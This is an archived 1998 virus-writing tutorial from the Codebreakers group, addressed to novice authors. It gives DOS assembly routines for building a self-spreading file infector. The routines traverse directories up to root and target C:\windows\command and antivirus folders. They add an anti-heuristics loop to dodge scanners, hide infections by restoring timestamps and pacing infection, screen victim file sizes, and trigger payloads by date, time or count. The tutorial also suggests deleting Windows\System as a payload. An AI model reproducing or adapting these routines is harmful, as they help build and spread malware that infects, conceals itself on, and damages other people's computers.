home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CODBRK3.ZIP
/
cb0207.txt
< prev
next >
Wrap
Text File
|
1998-03-25
|
16KB
|
346 lines
Virus "Add-Ons" Tutorial
by Opic [Codebreakers,1998]
Let me first say that this tutorial is directed at the newbie, and not for
experienced coders. That being said this tutorial is to aid you in coding
the "features" of your virus. Which, when you think about it, is pretty
fucking important! (please note that I will not be dealing with encryption or
the main virus body as Sea4 and Horny Toad have already covered these)It is
one of the only things that makes your virus unique. So throughout this
tutorial remember that you should not be cutting and pasting code here, I
want you to take the example I give you and expand upon them, make them
better or code them in a new way; in other words make it interesting and be
creative (why else might you code virii anyways?). The article is divided
into two sections: the first will be on techniques that are utilitary in
nature (they will add features to how the virus functions), the second will
be on payload and payload activation ideas and techniques.
SECTION 1.
CHANGING DIRECTORYS
Ok, the first technique I will show you is the simple DotDot method of
changing directories. This allows your runtime infecting virus to infect from
its starting directory all the way up to root infecting each directory and
its first subdirectory. We plug this into our virus by modifying our find-first
routine to jump to our DotDot routine, I'll include the minor change in code so
that it is blindingly clear to you what I mean. Here is the the DotDot routine
with our slightly modified find first:
find_first:
mov ah,4eh ;find's first file in the starting directory
lea dx,[bp+filespec] ;loads type of file we are looking for in dx
int 21h ;go dos!
jnc open ;found one! go to open and infect routine
;it should be noted that the findnext command
;should be somewhere in end of this routine
jmp DotDot ;otherwise change directory
DotDot: ;this is the dot dot routine
lea dx,[bp+dotdot] ;load dotdot from datasegment
mov ah, 3Bh ;int for "chdir" set current directory
int 21h ;do it!
jnc find_first ;find first file in new directory
jmp exit_stage_left ;we hit root and have now have max file
;infection (well max for this method)
dotdot db '..',0
understand? hopefully you do :) basically instead of exiting after
infecting just one dir we change to the next one infect it and its first
subdir and so on until we hit root, then exit. Likewise we can use 3Bh
to infect (or do anything we like to) a certain directory or subdirectory.
I'm sure you can all think of a directory alot of people have and you would
like to infect :) Well if you cant then don't worry, I've got your back
covered on this one: how 'bout Windows\Command? here's an example of how to
change directories to a specific directory:
windoze:
mov ah,3bh ;int to "chdir" set current directory
lea dx,winspec ;load windows location
int 21h ;go dos go!
jnc find_first ;find first file to infect
jmp exit_stage_left ;done with doze? lets bring it on home!
winspec db 'C:\windows\command',0
No big change right? Good! Enough said, you can use the DotDot routine in
combination with infecting specific directories which are likely to be present
on most systems to get a wider infection rate. Also consider other directories
which you may want to "modify" (such as your favorite AV scanner etc.).
SIMPLE ANTI-HEURISTICS LOOP
The next technique I'd like to show you is a simple loop to kill some
heuristic scanners. This can be effective when paired with encryption,
but doesn't perform well as a single measure against AV scanners.This one
should be pretty self explanatory so I wont say much about it other then
you should place it at the beginning of your virus ;)
mov cx,0ffffh ;should look familiar from other antiheurist loops
AH1: ;anti-Heur1 label
jmp AH2 ;jump AH2
mov ax,4c00h ;function 4ch: "exit" terminate with return code
int 21h ;go dos!
AH2: ;anti-huer2 label
loop AH1 ;loop AH1
Not much else I can say about this one except credits go to spo0ky for
resurrecting this old technique and giving it a makeover ;)
RESTORING TIME/DATE STAMPS
Want to make your virus a little less noticeable? It looks awfully strange
when all the infected files have the same time/date stamp doesnt it? Well
its a very simple procedure to save the time/date stamps and restore them
after infecting the file. Heres how simple it really is:
Get Time/Date stamps:
This should be done after you open the file but BEFORE you infect or modify
the file in any way.
mov ax,5700h ;get files time/date stamp
int 21h ;now!
push dx ;save the values
push cx ;in dx and cx
Restore Time/Date stamps:
This should be done right before you close the file.
mov ax,5701h ;restore files time/date stamp
pop dx ;from
pop cx ;dx and cx
int 21h ;now!
CONTROLING RATE OF INFECTION
Too much of a good thing can be bad right? Same goes for infecting files,
we want to infect as many of them as we can but we may not want to do it all
at one time as it may appear suspicious to the user that all his files have
suddenly grown by however many bytes your virus is. So lets take our time
and infect only so many files per run, the way we do this is via a infection
counter. The counter is a pretty versatile thing, we can use it for whatever
we want (example: we could also use it as a payload activation; payload
activates ever 15 runs or whatever) just use your imagination. At any rate
we will use it as a counter in this example which infects 10 files per run.
inc byte ptr [counter] ;add one to our counter
cmp byte ptr [counter],10 ;10 infections?
je Clear ;we hit 10? clear counter and exit!
Clear:
mov byte ptr [counter],0 ;clears infection counter
jmp exit_stage_left ;and get outta here!
counter db 0
The counter portion of the example should be placed at the end of your
infection routine, after you close the infected file. The "Clear" routine
should lie somewhere outside of the exit code so it is not executed
when it shouldn't be.
CHECKING VICTUM FILE SIZE
Heres one of many ways you can check the victims filesize to see if it should
be infected. files that are too large should not be infected as they will
corrupt due to the change in size your virus makes(an good example is
command.com which is not a "real" .com per say and can corrupt if more bytes
are added) Files too small should be avoided due to obvious reasons. This code
would be placed somewhere after we open the file and get file info. In this
example we are checking to see if the file is bigger the 4000 bytes or
smaller then 40 (purely random numbers to illustrate the method, I dont
recommend you use these particular figures for your standard size check ;)
cmp word ptr 1ah,4000 ;compare size with 4000
jna small ;ok not too big, too small?
jmp find_next ;its too big! find next file
small: ;lets see if its too small now
cmp word ptr 1ah,40 ;compare size with 40
jnb continue ;if bigger then 40 we are ok :)
jmp find_next
continue: ;skip the find_next jump and we
;proceed with infection.....
SECTION 2.
PAYLOADS AND PAYLOAD CRITERIA
This is the portion of your virus in which you should make it as unique
and interesting as possible. Not only to hone your creative mentality but
also to make your virus noticed After all there are thousands of virii
out there and the majority of them dont do ANYTHING interesting! And as a
consequence they are thrown into AV programs as Virus.874 (if they even
make it into a scanners library) simply because your virus did not have
many unique aspects which makes it interesting for the AV researcher to
investigate.So make it interesting and challenging and meanwhile you will
be making a name for yourself :) And remember that this is the only part
of your virus that the viewing audience will actually be able to see and
possibly even appreciate (or despise).
As for my opinion on destructive payloads;
I am not in favor of them, so if you want to learn how to format
a disk then go look for another tutorial. Destructive payloads have for
starters been done to death! Peoples hard drives have been fucked up by
virii in just about every way imaginable and its not all that impressive,
and its VERY easy to code(it takes 5 lines of code to format a disk)and
thus shows little ability on your part. But if you are dead set on making
a destructive payload I urge you to make it something which will alter the
system without destroying personal data, and one that is easily fixed (such
as hindering windows by removing the Windows\System dir which kills windows
but can be fixed by replacing the dir from the users Windows CD or whatever).
OK, enough about that.
Payload Criteria
There is an infinite number of activation routines. I obviously won't cover
them all but will show you a few common ones which you can incorporate and
adjust in your virii.
Date activation:
This is a very common way that virii activate. Heres how it breaks down:
we check the system date with int 21/2a, our returns we will want to compare
with are as follows:
CX=year (1980-2099)
DH=month
DL=day
AL=day of week (00h=sunday)
simple huh? Ill provide a few examples to be sure you understand.
Want to activate your virus only on Mondays?
mov ah,2ah ;gets system date
int 21h ;get it
cmp al,001h ;compares, is it monday?
;if you hadn't already guessed:
;001h=Mon 002h=Tue 003h=Wed, and so on...
je payload ;if so, run the payload
jmp exit_stage_left ;if not then we exit
Want your payload active on the 15th of every month?
mov ah,2ah ;get system date
int 21h ;go
cmp dl,15 ;is it the 15th?
je payload ;yes? lets do it!
jmp exit_stage_left ;no? outta here
Ok, but what about seconds and minutes you say? easy enough,
Lets say you wanted your payload to go off at 30 minutes when the
seconds are less then 40:
mov ah,2Ch ;checks internal clock
int 21h ;go
cmp cl,30d ;is the time 30 minutes?
jne exit_stage_left ;no? outta here
cmp dh,40d ;are the seconds less then 40?
jb payload ;yes? payload please!
jmp exit_stage_left ;no? outta here!
Alright, thats enough about time/date activation. Another common payload
activation routine is based upon infection count ie: the payload is activated
every certain number of infections. This is quite easily done via another
counter (please see CONTROLING RATE OF INFECTION for code).
You can also mix these two method for a more random payload activation,
such as after 15 files have been infected checking if the seconds are less
then 20 to activate your payload, giving your payload a seemingly random
occurence rate. Play with these techniques and explore new ones of your own.
Payloads:
Im obviously not going to show you full payloads to incorporate into your
virii but rather I will give you useful ideas and techniques for you to
incorporate into your payloads. Remember this is your window of opportunity
to do or say anything you want to the people who experience your virus, so
I urge you to make it good! please dont write some lame payload that makes
virii writers look like children writing with crayons on the wall ;) Be
poetic or artistic or political, or anything besides then lame, childish and
egotistical. And remember the more impressive and interesting your payloads
are, the more your virus will be noticed.
Displaying a message to the screen:
This is a pretty basic thing you should know.
mov ah,9h ;print string to standard output
lea dx,message ;get message from data segment
int 21h ;do it!
message db 'Daytime drives and drives afternoon taxi accident,',10,13,
db 'lunchtime. Rich in flavor, heavy, slow sunshines ',10,13,
db 'iron into iodine.',10,13,
db '',10,13
db 'Suriv, coded and copywrited:Opic,[codebreakers,98]',10,13,'$'
How about printing something out of the printer?
mov ah,01h ;begin of printer payload
mov dx,0h ;put 0h in dx
int 17h ;int for initializing printer
lea si,string1 ;load string1 to si
mov cx,String1Len ;move string1len to cx
PrintStr: ;label fer printing our message
mov ah,00h ;write characters
lodsb ;you know right :)
int 17h ;printer int
loop PrintStr ;loop printstr till we are done
String1Len EQU EndStr1-String1
String1 db 'Vive la difference!',0dh,0ah
db 'Suriv, coded and copywrited:Opic,[codebreakers,98]',0ch
EndStr1:
Graphics:
O.K, let me start by saying that programming graphics in ASM is pretty
goddamn difficult in my opinion. And Im NOT going to show you how to
do alot with graphics right now (this is a virus tut not a graphics
one right?) But I will show you some code to give you an idea of how
graphics in ASM work. Heres a bit of code that will create a blue pixel
in the center of your screen.
mov ax,13 ;sets mode 13h
int 10h ;int 10=video int
mov ah,0ch ;fuct 0Ch (look it up, you have the R.browns right?)
mov al,17 ;color 17=blue
mov cx,160 ;x axis position 160 (center)
mov dx,100 ;y axis position 100 (center)
int 10h ;thats it
Remember this is just the tip of the iceberg, creating good graphics in
ASM shows a tremendous amount of skill and patience, and is sure to dazzle
your audience :)
Heres a few other neat little things you could do if you wanted to be a
bit more subtle.
Changing the date:
mov ah,2bh ;set system date
mov cx,2001 ;change year to 2001
int 21h ;go!
;Im sure you know how to change it to a specific day by
;yourself, right?
Create a new subdirectory:
I think this one is kind of fun, just create a new subdirectory which you
could place on the desktop :)
mov ah,39h ;create new subdir
lea dx,dirname ;with the name of...
int 21h ;go!
dirname db 'Hello_user!',0
This should get you well on your way to writing more sophisticated
and interesting virii. Take the time and energy to make interesting code and
you will enjoy yourself that much more. Take the time to learn how to write
songs and graphics in asm if you are so inclined, they are challenging and
will improve your coding abilities. You could consider your virii "living
works of art" dont cheat them by writing a great virus with a half-assed
payload or visa versa. And above all enjoy whatever it is you create. That's
all for now.
- Opic [Codebreakers,98]
email: opic@thepentagon.com